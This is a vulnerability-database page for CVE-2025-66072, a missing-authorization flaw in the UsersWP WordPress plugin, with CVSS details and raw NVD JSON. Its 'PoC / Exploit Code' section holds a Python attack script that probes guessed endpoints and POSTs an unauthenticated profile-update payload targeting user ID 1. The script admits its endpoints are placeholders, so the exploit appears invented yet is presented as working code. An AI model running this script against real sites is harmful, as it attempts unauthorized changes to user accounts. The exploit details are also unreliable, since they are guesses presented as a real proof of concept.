Security Vulnerability Report
中文
CVE-2025-66072 CVSS 5.3 MEDIUM

CVE-2025-66072

Published: 2025-11-21 13:15:48
Last Modified: 2026-04-27 18:16:33

Description

Missing Authorization vulnerability in Stiofan UsersWP userswp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects UsersWP: from n/a through <= 1.2.47.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

UsersWP WordPress插件 <= 1.2.47

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-66072 PoC - Missing Authorization in UsersWP Plugin # Target: WordPress site with UsersWP plugin <= 1.2.47 TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-66072 Missing Authorization vulnerability in UsersWP plugin """ # Try to access sensitive endpoint without authentication # Replace endpoint with actual vulnerable endpoint discovered vulnerable_endpoints = [ f"{TARGET_URL}/wp-json/userswp/v1/users", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=uwp_process", f"{TARGET_URL}/?userswp_action=profile_update" ] for endpoint in vulnerable_endpoints: try: response = requests.get(endpoint, timeout=10) # If response indicates unauthorized access succeeded if response.status_code == 200 and "user" in response.text.lower(): print(f"[+] Potential vulnerability found at: {endpoint}") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return False def exploit_authorization_bypass(): """ Exploit the authorization bypass to perform unauthorized actions """ # Example: Unauthorized user data modification exploit_payload = { "user_id": 1, "action": "update_profile", "data": "malicious_input" } response = requests.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=exploit_payload, headers={"Content-Type": "application/x-www-form-urlencoded"} ) if response.status_code == 200: print(f"[+] Exploit sent successfully") print(f"Response: {response.text}") if __name__ == "__main__": print("CVE-2025-66072 UsersWP Authorization Bypass PoC") print("=" * 50) if check_vulnerability(): print("[!] Target appears to be vulnerable") exploit_authorization_bypass() else: print("[-] Target does not appear to be vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66072", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:48.240", "lastModified": "2026-04-27T18:16:33.297", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Stiofan UsersWP userswp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects UsersWP: from n/a through <= 1.2.47."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/userswp/vulnerability/wordpress-userswp-plugin-1-2-47-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}